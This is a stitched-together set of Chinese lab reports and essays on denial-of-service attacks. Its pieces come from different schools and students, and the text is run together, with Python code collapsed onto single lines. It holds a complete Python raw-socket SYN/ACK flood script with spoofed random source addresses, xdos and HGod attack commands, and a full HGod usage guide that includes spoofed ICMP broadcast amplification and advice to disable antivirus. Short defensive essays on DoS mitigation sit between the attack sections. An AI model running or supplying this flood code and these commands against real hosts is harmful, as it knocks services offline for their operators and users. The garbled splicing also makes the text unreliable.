网络安全实验报告 - 拒绝服务攻击

实验4：拒绝式服务攻击与防范【实验目的】熟悉SYNflood的攻击原理与过程，及IPv4所存在的固有缺陷。

【实验准备】准备xdos.exe拒绝服务工具。

【注意事项】实验后将DoS黑客软件从机器彻底删除，避免恶意应用影响网络运行。

【实验步骤】一、拒绝式服务攻击拒绝服务攻击的英文意思是Denial of Service，简称DoS。

这种攻击行动使网站服务器充斥大量要求回复的信息，消耗网络带宽或系统资源，导致网络或系统不胜负荷直至瘫痪而停止提供正常的网络服务。

SYN-Flood是当前最常见的一种Dos攻击方式，它利用了TCP协议的缺陷进行攻击用黑客软件xdos.exe对目标计算机进行拒绝服务攻击并运行测试。

（1）计算机a登录到windows 2000，打开sniffer pro,在sniffer pro中配置好捕捉从任意主机发送给本机的ip数据包，并启动捕捉进程。

（2）在计算机B上登录Windows 2000,打开命令提示窗口，运行xdos.exe,命令的格式：‖xdos<目标主机IP>端口号–t 线程数[-s <插入随机IP>’]‖(也可以用―xdos?‖命令查看使用方法)。

输入命令：xdos 192.168.19.42 80 –t 200 –s* 确定即可进行攻击，192.168.19.42 是计算机A的地址。

（3）在A端可以看到电脑的处理速度明显下降，甚至瘫痪死机，在Sniffer Pro的Traffic Map 中看到最大伪造IP的主机请求与A的电脑建立连接。

（4）B停止攻击后，A的电脑恢复快速响应。

打开捕捉的数据包，可以看到有大量伪造IP地址的主机请求与A的电脑连接的数据包，且都是只请求不应答。

以至于A的电脑保持有大量的半开连接。

运行速度下降直至瘫痪死机，拒绝为合法的请求服务。

二、拒绝式服务防范几乎所有的主机平台都有抵御DoS的设置，常见的有以下几种。

(1)关闭不必要的服务。

信息安全与管理专业实训报告学生姓名：一、实训名称：拒绝服务攻击-TCP SYN Flood攻击与防御。

二、实训内容1、kali的安装部署2、SYN Flood攻击演示3、观察受攻击目标的系统状态4、防御措施三、实验步骤1、python攻击代码环境：ubuntu/kali +python 2.7.11使用方法如下：mode有三种模式syn攻击、ack攻击、混合攻击，虽说是支持多线程但是多个线程反而不如单线程快，估计是我的多线程弄得有些问题，麻烦这方面比较懂的朋友帮我指点一下。

我电脑是i7-6700单线程也只能这点速度。

cpu1已经使用89%了看一下抓包情况吧，因为只是测试用我也没带tcp的options字段，报文长度也不够64字节，不过也能传到目的地址。

下面是代码：#!/usr/bin/python#-*-coding:utf-8-*-import socketimport structimport randomimport threadingclass myThread (threading.Thread):def __init__(self,dstip,dstport,mode):threading.Thread.__init__(self)self.dstip = dstipself.dstport =dstportself.mode =modedef run(self):attack(self.dstip,self.dstport,self.mode)def checksum(data):s = 0n = len(data) % 2for i in range(0, len(data)-n, 2):s+= ord(data[i]) + (ord(data[i+1]) << 8) if n:s+= ord(data[i+1])while (s >> 16):s = (s & 0xFFFF) + (s >> 16)s = ~s & 0xffffreturn sdef IP(source,destination,udplen):version = 4ihl = 5tos = 0tl = 20+udplenip_id = random.randint(1,65535)flags = 0offset = 0ttl = 128protocol =6check =0source = socket.inet_aton(source)destination = socket.inet_aton(destination)ver_ihl = (version << 4)+ihlflags_offset = (flags << 13)+offsetip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,check,source,destination)check=checksum(ip_header)ip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,socket.htons(check),source,destination)return ip_headerdef TCP(srcip,dstip,protocol,dp,fg):source = socket.inet_aton(srcip)destination = socket.inet_aton(dstip)srcport=random.randint(1,65535)dstport=dpsyn_num=random.randint(1,4000000000)if fg == 2:ack_num=0else:ack_num=random.randint(1,4000000000) hlen=5zero=0flag=fgwindow=8192check=0point=0tcplen=hlenh_f=(hlen << 12)+flagTCP_head=struct.pack("!4s4sHHHHIIHHHH",source,destination,protocol,tcplen,srcport,dstport,s yn_num,ack_num,h_f,window,check,point)check=checksum(TCP_head)TCP_head=struct.pack("!HHIIHHHH",srcport,dstport,syn_num,ack_num,h_f,window,check,point )return TCP_headdef makepacket(dstip,dstport,fg):srcip=str(random.choice(ip_first))+'.'+str(random.randint(1,255))+'.'+str(random.randint(1,255))+'. '+str(random.randint(1,255))protocol=6ippacket=IP(srcip,dstip,5)+TCP(srcip,dstip,protocol,dstport,fg)return ippacketdef attack(dstip,dstport,mode):if mode == 'syn':fg=2while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'ack':fg=18while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'syn&ack':while 1:data=makepacket(dstip,dstport,2)s.sendto(data,(dstip,dstport))data=makepacket(dstip,dstport,18)s.sendto(data,(dstip,dstport))else:print 'DON\'T xia say!'dstip=raw_input('attack IP:')dstport=int(input('attack PORT:'))mode=raw_input('mode:(syn or ack or syn&ack)') threads=int(input("线程数threads："))ip_first=[]for i in range(1,10):ip_first.append(i)for i in range(11,172):ip_first.append(i)for i in range(173,192):ip_first.append(i)for i in range(193,224):ip_first.append(i)s = socket.socket(socket.AF_INET,socket.SOCK_RAW,6) s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)threads_name=[]for i in range(threads):threads_name.append('teread'+str(i))for i in range(threads):threads_name[i]=myThread(dstip,dstport,mode)for i in range(threads):threads_name[i].start()2、C语言攻击代码环境：ubuntu/kali gcc version 6.1.1 20160802 (Debian 6.1.1-11)使用方法：支持两个参数目的ip和目的端口性能：限制发包速度的是带宽（我这是100M的网，除去报文的前导码和帧间隔极限速度差不多就是9m左右了），cpu利用才27%，我在1000Mbps的网速下测试，单线程的话速度能到40m左右，cpu占用率大约85%左右。

网络安全测试中的拒绝服务攻击与防范网络安全在当今信息时代的重要性不言而喻，随着科技的快速发展，人们越来越依赖于网络进行各种活动。

然而，网络的普及也带来了一系列的安全威胁，其中之一就是拒绝服务攻击（Denial of Service，DoS）。

本文将探讨网络安全测试中的拒绝服务攻击与防范方法。

一、拒绝服务攻击的定义与原理拒绝服务攻击是指攻击者通过发送大量的请求，占用目标系统的全部或部分资源，导致合法用户无法正常访问该系统的情况。

攻击者通过消耗目标系统的带宽、计算资源或存储资源等方式，造成系统负载过高而无法响应合法用户的请求。

拒绝服务攻击的原理在于攻击者通过发送大量的恶意请求，耗尽目标系统的资源，从而引发系统崩溃或运行缓慢。

常见的拒绝服务攻击手段包括：泛洪攻击（Flood Attack）、碎片攻击（Fragmentation Attack）、应用层攻击（Application Layer Attack）等。

二、拒绝服务攻击的影响拒绝服务攻击给目标系统带来了严重的影响，其中包括以下几个方面：1. 网站瘫痪：拒绝服务攻击会导致目标网站无法正常运行，用户无法访问网站，给网站运营者带来巨大的经济损失。

2. 数据泄露：攻击者利用拒绝服务攻击的机会，可能获取并窃取系统中的重要数据，给用户和机构带来隐私泄露的风险。

3. 声誉受损：拒绝服务攻击会导致目标系统长时间不可用，使得用户对该系统的可靠性和稳定性产生质疑，进而对企业的声誉造成损害。

三、拒绝服务攻击的防范方法为了保护系统免受拒绝服务攻击的影响，需要采取一系列的防范措施。

下面是几种常见的防范方法：1. 增加带宽：通过增加带宽的方式，可以提高系统对大规模攻击的抵御能力。

这样系统能够更快地缓解攻击期间的负载压力。

2. 流量过滤：利用防火墙、入侵检测系统（IDS）等安全设备对流量进行过滤和识别，屏蔽恶意流量和异常请求，过滤掉拒绝服务攻击。

3. 负载均衡：通过负载均衡技术，将流量分散到多台服务器上，分摊压力，提高系统的稳定性和可靠性，从而减轻拒绝服务攻击的影响。

拒绝服务攻击的叙述
拒绝服务攻击（Denial of Service Attack，简称DoS攻击）是
指通过向目标系统发送大量无效或恶意请求，使目标系统无法正常提
供服务的一种网络攻击手段。

在拒绝服务攻击中，攻击者利用自己的计算机或控制的僵尸网络（botnet）向目标系统发送大量的网络请求，以消耗目标系统的带宽、计算资源或存储资源。

这样一来，目标系统就无法处理正常的用户请求，从而造成服务不可用的情况。

DoS攻击的目的通常是瘫痪目标系统或网络，使其无法正常工作，阻止合法用户访问该系统或网络。

这种攻击方式可以导致目标系统的
服务暂时中断或长时间停止服务，给其运营者和用户带来极大的不便。

为了进行拒绝服务攻击，攻击者通常采用各种手段，如洪水攻击、缓冲区溢出攻击、合成流量攻击等。

无论使用何种攻击手段，其最终
目的都是占用目标系统的资源，使其无法正常运行。

为了防止拒绝服务攻击，系统管理员可以采取一系列措施，如增加带
宽容量、使用入侵检测和预防系统、过滤恶意请求等等。

此外，监控
系统日志、定期备份数据以及设置灾备方案也是必要的防御措施。

由于拒绝服务攻击具有易于实施、难以追踪的特点，对于网络安
全的保护和预防是至关重要的。

及时发现并应对拒绝服务攻击，对于
保障系统和网络的正常运行非常重要。

华北电力大学
实验报告|
|
实验名称拒绝服务攻击实验
课程名称网络攻击与防范
|
|
专业班级：网络学生姓名：
学号：成绩：
指导教师：曹锦纲实验日期：
3、此时打开百度页面，可以看到能抓到所有发给PC2的ip数据包。

4、在PC1上打开XDos.exe，命令的格式为：xdos <目标主机IP> 端口号 -t 线程数 [-s <插入随机IP>]。

输入命令：xdos 192.168.137.3 80 -t 200 -s*，回车即可攻击，192.168.137.3是PC2的IP地址。

5、在PC2中可以看到大量伪造IP地址的主机请求与PC2的电脑建立连接。

且能通过捕捉到的数据包看到都是只请求不应答，以至于PC2保持有大量的半开连接。

6、停止攻击后，PC2不再接收到数据包。

五、拒绝式服务防范
几乎所有的主机平台都有抵御DoS的设置，常见的有以下几种：
（1）关闭不必要的服务。

（2）限制同时打开的Syn半连接数目。

（3）缩短Syn半连接的time out时间。

（4）及时更新系统补丁.
六、实验心得与体会。

信息安全——拒绝服务式攻击班级：９班姓名：周杰学号：53080907一.实验设计1.使用sniffer 工具网络监听。

2.使用sniffer 工具对监听到得网络数据进行分析3.进行拒绝服务攻击4.使用sniffer 软件监视网络状态 二.实验步骤步骤1 用sniffer 抓icmp 和IP 包1．设置过滤器，在地址中设置捕获IP 数据，（注意，位置1处必须填本机的IP 地址），在高级中选择IP 协议里面的ICMP 协议，如图所示：图1图 22．使用ping 命令时进行捕获：选择“捕获开始”按钮→运行ping 命令，ping 任意主机→当“捕获停止并查看”按钮变成黑色时，点击它位置1图3在弹出的对话框中点击“解码系统”就可以看到捕获的数据了图4将捕获到的图粘帖在下方抓包分析如图：图 5图 6步骤2 使用Sniffer 软件监视网络的状态1．在被攻击的主机上打开Sniffer Pro ，选择Monitor/Matrix 命令，打开Traffic Map 视图，可以查看任意主机发给被攻击主机的IP 数据包。

图7 将打开的Traffic Map视图粘帖在下方：2.查看当前的报文统计，打开Dashbord面板统计平均数据或总和为统计图选择统计指标图8步骤3使用HGod拒绝服务攻击软件注意：部分杀毒软件可把此程序当成病毒杀掉，所以在使用时可能需要关闭杀毒软件将该软件直接解压到磁盘根目录下，如D:运行“开始”→“运行”，输入“cmd”，打开cmd命令行对话窗口输入“cd\”直接退到磁盘根目录下，进入D盘盘符，如图所示图9运行HGod拒绝服务攻击工具对某台主机进行攻击图10<Target>为要攻击的目标,可以是计算机名,域名或者IP地址.<StartPort> 为要攻击的目标端口. IGMP/ICMP攻击模式可以随便设置一个端口如果是SYN Flood可以支持多端口同时攻击.如SYN Flood攻击20-80的端口,则设为20-80如SYN Flood攻击21,23,80端口,则设为21,23,80. 端口总数不能多于100个.[Option] 为攻击参数选项.各参数如下:-a:AttackTime 为攻击时间选项,为0-14400分钟, 设0为一直攻击, 默认为0.如果要攻击1个小时, 请设为-a:60如果要攻击1天, 请设为-a:1440最大设为10天.大于10天,请不要设置.-b:Packsize 为攻击时发送的数据包大小, 为1-65400比特. (SYN Flood 不用设置包大小.)如果定制数据包的大小为10000, 请设为 -b:10000-d:Delay 为发送数据包之间的延时, 为0-1000ms. 默认为10ms. (SYN Flood 不用设置延时.)如果定制延时为1ms, 请设为-b:1-l:Speed 网络连接速度选择, 为1-200M, 只为SYN Flood攻击参数. 如果你的网速小于10M, 必须设置.如果你的网速为<1M, 请设为 -l:1如果你的网速为<2M, 请设为 -l:2类推, 程序自动设置最佳攻击方式.-m:Mode 使用的攻击种类, 为SYN/UDP/ICMP/IGMP, 默认为SYN.如果你要使用IGMP炸弹攻击, 请使用-m:igmp-n:Num 设置源IP变化的范围, 可以设为1-65535. 只为SYN Flood攻击参数.如果你想源IP变化的范围为一个c段, 请使用 -n:255 -p:SourcePort设置攻击时的源端口, 默认为不用设置, 程序自动产生随机源端口并封装. ICMP/IGMP不用设置.如果你设端口为80, 请使用-p:80 -s:SourceIP 设置攻击时的源IP地址, 默认为不用设置, 程序自动产生随机IP并封装, IGMP不用设置.如果设源IP为192.168.0.1, 请使用-s:192.168.0.1ICMP攻击模式中, 你可以设攻击IP为源IP, 把目标IP设为一个广播地址. 这样可以让源IP收到多倍的数据包.-t:Thread 攻击时使用的线程数, 为1-100, 默认为10个线程.如果要设为使用1个线程进行攻击, 请使用 -t:1按照用法对某台主机进行攻击,比如输入：hgod 192.168.0.1 80hgod 192.168.0.1 21,23,80 -t:20 -l:10 -s:192.168.0.1 -n:65535hgod 192.168.0.255 4000 -m:icmp -t:20 -d:1 -s:192.168.0.1hgod 192.168.0.1 4000 -m:igmp -d:1 -a:1000步骤4 在被攻击主机上使用Sniffer查看计算机的处理速度三.参考文献：［1］李德全著，拒绝服务攻击，电子工业出版社，第一版。

拒绝服务攻击及预防措施拒绝服务攻击（Denial-of-Service Attack，简称DoS攻击）是一种常见的网络攻击方式，它以意图使目标系统无法正常提供服务的方式进行攻击，给网络安全带来了严重的威胁。

本文将介绍拒绝服务攻击的原理和常见类型，并提供一些预防措施以保护系统免受此类攻击的影响。

一、拒绝服务攻击的原理拒绝服务攻击的核心原理是通过向目标系统发送大量的请求，耗尽其处理能力或网络带宽，从而使其无法对合法用户提供正常服务。

攻击者可以利用多种方式进行DoS攻击，下面是一些常见的攻击类型：1. 集中式DoS攻击（Conventional DoS Attack）集中式DoS攻击是指通过一个或多个源（攻击者）向目标服务器发送大量请求。

这种攻击利用了网络协议本身的设计漏洞或系统资源限制，例如TCP/IP握手过程中的资源消耗问题，使得目标服务器无法正常处理合法用户请求。

2. 分布式拒绝服务攻击（Distributed Denial-of-Service Attack，简称DDoS攻击）分布式拒绝服务攻击是由多个不同的源（攻击者）同时向目标系统发起攻击，通过同时攻击的规模和多样性来超过目标系统的处理能力。

攻击者通常通过僵尸网络（Botnet）来执行此类攻击。

二、拒绝服务攻击的预防措施为了有效地应对拒绝服务攻击，以下是一些常见的预防措施：1. 增加网络带宽网络带宽是系统处理大量请求的关键资源之一。

增加网络带宽可以提高系统的处理能力，减轻拒绝服务攻击带来的影响。

同时，合理使用流量限制等机制可以控制并阻止一些恶意流量对系统的影响。

2. 强化网络设备和操作系统的安全性网络设备和操作系统的安全性是防范拒绝服务攻击的重要环节。

更新并及时修补设备和操作系统的安全漏洞，使用最新的防火墙、入侵检测系统和安全软件等网络安全工具来检测和阻止攻击流量。

3. 流量过滤和负载均衡通过使用流量过滤和负载均衡等技术，可以识别和过滤掉来自攻击者的恶意流量，将合法用户的请求分配到不同的服务器中进行处理，从而防止拒绝服务攻击对目标系统造成影响。